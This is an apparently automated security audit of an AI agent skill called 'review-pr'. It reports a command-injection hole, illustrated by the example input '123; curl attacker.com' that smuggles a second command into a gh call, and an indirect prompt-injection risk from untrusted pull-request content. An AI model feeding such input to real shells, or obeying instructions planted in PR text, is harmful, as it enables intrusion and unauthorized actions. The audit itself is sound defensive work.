review-pr

Fail

Audited by Gen Agent Trust Hub on Jun 23, 2026

Risk Level: HIGHCOMMAND_EXECUTIONPROMPT_INJECTION
Full Analysis
  • [COMMAND_EXECUTION]: The skill constructs shell commands by directly interpolating the user-supplied argument $0 into GitHub CLI commands (gh pr view $0, gh pr diff $0). This pattern allows a malicious user to execute arbitrary shell commands by providing inputs containing shell metacharacters (e.g., 123; curl attacker.com). While the instructions include a natural language validation step, it does not provide a technical safeguard against command injection.
  • [PROMPT_INJECTION]: The skill ingests untrusted data from pull request titles, bodies, and code diffs, which creates a surface for indirect prompt injection. An attacker could craft a PR with embedded instructions aimed at manipulating the agent's review logic or performing unauthorized actions.
  • Ingestion points: PR metadata and diff content fetched via gh commands.
  • Boundary markers: Absent; the skill lacks delimiters or explicit instructions to treat PR content as untrusted data.
  • Capability inventory: The skill utilizes shell commands (gh) which could be abused if the agent is manipulated.
  • Sanitization: Absent; the external PR content is passed directly into the agent's context for analysis.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Jun 23, 2026, 04:15 PM
Security Audit — agent-trust-hub — review-pr